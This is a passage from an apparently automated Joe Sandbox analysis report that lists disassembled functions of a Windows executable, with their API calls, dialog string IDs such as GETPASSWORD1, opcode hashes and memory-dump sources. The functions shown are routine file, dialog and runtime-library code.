                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: 26bd06d7ab68a3df33aab544523714ca08f67aa180720a5ea304cceef83e9edb
                                                                                              • Instruction ID: cf278ec07085e8b141c60b86e3dbf7690d3563461719e1f29fcd0ee8e9a1f5c2
                                                                                              • Opcode Fuzzy Hash: 26bd06d7ab68a3df33aab544523714ca08f67aa180720a5ea304cceef83e9edb
                                                                                              • Instruction Fuzzy Hash: 4111C432900119BADB229A65AC49FFF376DEF59710F048020FA49F2191D7A4DE459771
                                                                                              Function 00C7DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: d0613dc57292b0efafb0d72ca0fd282d7580f356bf3f50304a290de0974fcd31
                                                                                              • Instruction ID: fe9dd64b476cdb21037b17e424f1bfc501fd604d52040dd0aa5d62fba2fb6b4c
                                                                                              • Opcode Fuzzy Hash: d0613dc57292b0efafb0d72ca0fd282d7580f356bf3f50304a290de0974fcd31
                                                                                              • Instruction Fuzzy Hash: 73019276604245AFCB215F95FC44B9E3FB5FB19788F008425F90A83270C6319D50DBB0
                                                                                              Function 00C89A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                              • Instruction ID: 0cf895d104470bc0ca7879bd750488f756615a90efb731e7d6082eeb681e3486
                                                                                              • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                              • Instruction Fuzzy Hash: EDA18B72A003869FEB25EF68C8817BEBBE5EF55318F2C416DE4959B281C3358E41C758
                                                                                              Function 00C6A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00C67F69,?,?,?), ref: 00C6A3FA
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00C67F69,?), ref: 00C6A43E
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00C67F69,?,?,?,?,?,?,?), ref: 00C6A4BF
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00C67F69,?,?,?,?,?,?,?,?,?,?), ref: 00C6A4C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: 4c4e3e5c211e34d980f7779606bb7c9b48b27ed69e209d297bf1b20391380f84
                                                                                              • Instruction ID: c5d1e0f5931193ad398033d0c6a3e599a3db883f008b3ca9a6020e996ac2ac6b
                                                                                              • Opcode Fuzzy Hash: 4c4e3e5c211e34d980f7779606bb7c9b48b27ed69e209d297bf1b20391380f84
                                                                                              • Instruction Fuzzy Hash: 5B41AF312483819AD731DF24DC89FAEBBE4AF85700F044919F5E5A3291DAA4DB48DF53
                                                                                              Function 00C61100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: 1410de876c5640b9d4b414cbfc434f3a3875022dd66f30b0e803a88028a53e2a
                                                                                              • Instruction ID: 7379d04a4122755247d0b3f3859f65f56ef9b1c1477bcecdc640fea4161e26cc
                                                                                              • Opcode Fuzzy Hash: 1410de876c5640b9d4b414cbfc434f3a3875022dd66f30b0e803a88028a53e2a
                                                                                              • Instruction Fuzzy Hash: 4141C3B19006699BCB21AF68CC5AAEF7BB8EF01311F044029FD45F7241DB30AE558BA4
                                                                                              Function 00C8C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00C891E0,?,00000000,?,00000001,?,?,00000001,00C891E0,?), ref: 00C8C9D5
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8CA5E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00C86CBE,?), ref: 00C8CA70
                                                                                              • __freea.LIBCMT ref: 00C8CA79
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: 10b962f8d25e5b9b6a7734aa92d13168c08cf22402094e0c8b3ab2dbf1960bd9
                                                                                              • Instruction ID: 985ea1c5133df5a1398fffc9328b09be6462d517dd5b69af4b208bce9fc692d5
                                                                                              • Opcode Fuzzy Hash: 10b962f8d25e5b9b6a7734aa92d13168c08cf22402094e0c8b3ab2dbf1960bd9
                                                                                              • Instruction Fuzzy Hash: 4C31A072A0021AABDF28EF64DC85EEE7BA5EB01314B044169FC14E7150E735DE50EBA4
                                                                                              Function 00C7A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00C7A666
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7A675
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7A683
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00C7A691
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 5b8d861bb9e5224ea53074ec79f98fdf0b3fda5790f6f4944606e8b9d1616a97
                                                                                              • Instruction ID: 37fe67bd444418f53aac45912b588669c053093d25b5332a0ee8e86c80ae3bf0
                                                                                              • Opcode Fuzzy Hash: 5b8d861bb9e5224ea53074ec79f98fdf0b3fda5790f6f4944606e8b9d1616a97
                                                                                              • Instruction Fuzzy Hash: 02E01233942761B7D3616B60FD1DF8F3E54FB0AB52F018501FB05961D0DB7486048BA5
                                                                                              Function 00C7A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C7A699: GetDC.USER32(00000000), ref: 00C7A69D
                                                                                                • Part of subcall function 00C7A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C7A6A8
                                                                                                • Part of subcall function 00C7A699: ReleaseDC.USER32(00000000,00000000), ref: 00C7A6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00C7A83C
                                                                                                • Part of subcall function 00C7AAC9: GetDC.USER32(00000000), ref: 00C7AAD2
                                                                                                • Part of subcall function 00C7AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00C7AB01
                                                                                                • Part of subcall function 00C7AAC9: ReleaseDC.USER32(00000000,?), ref: 00C7AB99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: a81a774b2278deddb1586c407a0c0188cd29b3cac2edbcd18c938b79e4deb7a1
                                                                                              • Instruction ID: a6faa71342f053fd9858cf46e6daf9592b9dc26b4e48b90898e4c9d87816c5f9
                                                                                              • Opcode Fuzzy Hash: a81a774b2278deddb1586c407a0c0188cd29b3cac2edbcd18c938b79e4deb7a1
                                                                                              • Instruction Fuzzy Hash: EA91CF71608794AFD710DF25D848A2FBBE8FBC9710F00891EF59AD3261DB30A945CB62
                                                                                              Function 00C8B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C8B324
                                                                                                • Part of subcall function 00C89097: IsProcessorFeaturePresent.KERNEL32(00000017,00C89086,00000050,00C93A34,?,00C6D710,00000004,00CA1030,?,?,00C89093,00000000,00000000,00000000,00000000,00000000), ref: 00C89099
                                                                                                • Part of subcall function 00C89097: GetCurrentProcess.KERNEL32(C0000417,00C93A34,00000050,00CA1030), ref: 00C890BB
                                                                                                • Part of subcall function 00C89097: TerminateProcess.KERNEL32(00000000), ref: 00C890C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2667617558-3972193922
                                                                                              • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                              • Instruction ID: d041ce0a7fea69b87bf64adbd3d05f7f75d071e39436b5d018c6b4dce1e2d440
                                                                                              • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                              • Instruction Fuzzy Hash: 3F518271E0020AEFDF14EFA8C881AADF7B5EF58318F244169E854E7351EB359E019B54
                                                                                              Function 00C675DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C675E3
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                                • Part of subcall function 00C6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C6777F
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              • Opcode ID: ea98b2d1d5fec578c6bba785705bf0080f0b3e950eefa8144484a55beaf99287
                                                                                              • Instruction ID: a59f58f4e68a3d8a1b580759f1993fb0b3c6fb315c30fe23e1f0050888e83170
                                                                                              • Opcode Fuzzy Hash: ea98b2d1d5fec578c6bba785705bf0080f0b3e950eefa8144484a55beaf99287
                                                                                              • Instruction Fuzzy Hash: E8417171804158AAEB35EB64CCD9EEEB37CEF45304F008596B60AA2092DB749F85DF61
                                                                                              Function 00C7B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              • Opcode ID: 6528fa0c4c8dc3f15fe68d2c272f4faf65a60e5012bccd3be00cd36d8263c168
                                                                                              • Instruction ID: b181bab1c53fbf5b9232bd27f58527e0a1d985becea8d4f7cd4e9a9e96add1a2
                                                                                              • Opcode Fuzzy Hash: 6528fa0c4c8dc3f15fe68d2c272f4faf65a60e5012bccd3be00cd36d8263c168
                                                                                              • Instruction Fuzzy Hash: 4E21F07290431A5ADB31EA64D845F6BB3ECDF81758F14842AF648C3141FB74EE4893A6
                                                                                              Function 00C6F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C6F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C6F2E4
                                                                                                • Part of subcall function 00C6F2C5: GetProcAddress.KERNEL32(00CA81C8,CryptUnprotectMemory), ref: 00C6F2F4
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00C6F33E), ref: 00C6F3D2
                                                                                              Strings
                                                                                              • CryptProtectMemory failed, xrefs: 00C6F389
                                                                                              • CryptUnprotectMemory failed, xrefs: 00C6F3CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: 4b8130576bea16053071f1655ac0057a25bc8f2689dc9e76599be1482b34bfb7
                                                                                              • Instruction ID: 548afac30086b03eb6652738e226390388690b5f3230b1f725f5bdd0c697165c
                                                                                              • Opcode Fuzzy Hash: 4b8130576bea16053071f1655ac0057a25bc8f2689dc9e76599be1482b34bfb7
                                                                                              • Instruction Fuzzy Hash: A7110331A01669ABEF319B25EC89B6E3754FF01B24B04813AFC116B361DB349E038790
                                                                                              Function 00C6B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C6B9B8
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: d6dbdbf540fc18cb60bb29bc3f8a5d22ceb8ed5f985a60ec78c3a27b73c0cbe0
                                                                                              • Instruction ID: acd7e15c3dfe86e739574cee09ab1853780c32d262cbb15f233bac988fe17aaf
                                                                                              • Opcode Fuzzy Hash: d6dbdbf540fc18cb60bb29bc3f8a5d22ceb8ed5f985a60ec78c3a27b73c0cbe0
                                                                                              • Instruction Fuzzy Hash: A601F16350031279DA30BB768CC6D6BA7ACEF91770B40481AF558D6082EB20DD80E3B1
                                                                                              Function 00C7101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00C71160,?,00000000,00000000), ref: 00C71043
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00C7108A
                                                                                                • Part of subcall function 00C66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C66C54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: d677eaba13efbd437753352e9abf1df281430b5ce29898e49740038c926a433c
                                                                                              • Instruction ID: 78e2106f62e8fd6d020a152035ba2d0024b3ab843064a3089405f3ddcf7d880c
                                                                                              • Opcode Fuzzy Hash: d677eaba13efbd437753352e9abf1df281430b5ce29898e49740038c926a433c
                                                                                              • Instruction Fuzzy Hash: A20126B530034A7FD7305E68AC81B7A73A8FB40755F24002EFE8A52180CAA068858220
                                                                                              Function 00C61316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C6E2E8: _swprintf.LIBCMT ref: 00C6E30E
                                                                                                • Part of subcall function 00C6E2E8: _strlen.LIBCMT ref: 00C6E32F
                                                                                                • Part of subcall function 00C6E2E8: SetDlgItemTextW.USER32(?,00C9E274,?), ref: 00C6E38F
                                                                                                • Part of subcall function 00C6E2E8: GetWindowRect.USER32(?,?), ref: 00C6E3C9
                                                                                                • Part of subcall function 00C6E2E8: GetClientRect.USER32(?,?), ref: 00C6E3D5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                              • SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              Strings
                                                                                              Memory Dump Source
